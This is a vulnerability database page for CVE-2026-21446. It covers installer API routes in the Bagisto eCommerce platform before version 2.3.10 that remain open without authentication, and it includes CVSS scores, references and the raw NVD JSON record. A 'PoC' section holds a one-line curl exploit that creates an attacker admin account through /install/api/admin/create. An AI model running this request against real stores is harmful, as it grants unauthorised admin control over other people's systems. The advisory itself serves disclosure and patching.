CVE-2026-21446

Description

Bagisto is an open source laravel eCommerce platform. In versions on the 2.3 branch prior to 2.3.10, API routes remain active even after initial installation is complete. The underlying API endpoints (`/install/api/*`) are directly accessible and exploitable without any authentication. An attacker can bypass the Ib installer entirely by calling the API endpoints directly. This allows any unauthenticated attacker to create admin accounts, modify application configurations, and potentially overwrite existing data. Version 2.3.10 fixes the issue.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:webkul:bagisto:*:*:*:*:*:*:*:* - VULNERABLE

Bagisto < 2.3.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

curl -X POST http://target/install/api/admin/create -d '{"username":"attacker","password":"evil123","email":"[email protected]"}'

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21446
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21446
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21446/
[4] VulDB https://vuldb.com/cve/CVE-2026-21446
[5] https://github.com/bagisto/bagisto/commit/380c045e48490da740cd505fb192cc45e1809bed
[6] https://github.com/bagisto/bagisto/security/advisories/GHSA-6h7w-v2xr-mqvw

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21446", "sourceIdentifier": "[email protected]", "published": "2026-01-02T20:16:18.020", "lastModified": "2026-01-08T21:25:06.213", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bagisto is an open source laravel eCommerce platform. In versions on the 2.3 branch prior to 2.3.10, API routes remain active even after initial installation is complete. The underlying API endpoints (`/install/api/*`) are directly accessible and exploitable without any authentication. An attacker can bypass the Ib installer entirely by calling the API endpoints directly. This allows any unauthenticated attacker to create admin accounts, modify application configurations, and potentially overwrite existing data. Version 2.3.10 fixes the issue."}, {"lang": "es", "value": "Bagisto es una plataforma de comercio electrónico laravel de código abierto. En versiones de la rama 2.3 anteriores a la 2.3.10, las rutas de la API permanecen activas incluso después de que la instalación inicial se haya completado. Los endpoints de la API subyacentes ('/install/api/*') son directamente accesibles y explotables sin ninguna autenticación. Un atacante puede omitir el instalador de Ib por completo llamando directamente a los endpoints de la API. Esto permite a cualquier atacante no autenticado crear cuentas de administrador, modificar configuraciones de la aplicación y potencialmente sobrescribir datos existentes. La versión 2.3.10 corrige el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webkul:bagisto:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.3.0", "versionEndExcluding": "2.3.10", "matchCriteriaId": "284410C8-A6CA-4BA3-A484-8E4B8EE3DC4E"}]}]}], "references": [{"url": "https://github.com/bagisto/bagisto/commit/380c045e48490da740cd505fb192cc45e1809bed", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-6h7w-v2xr-mqvw", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}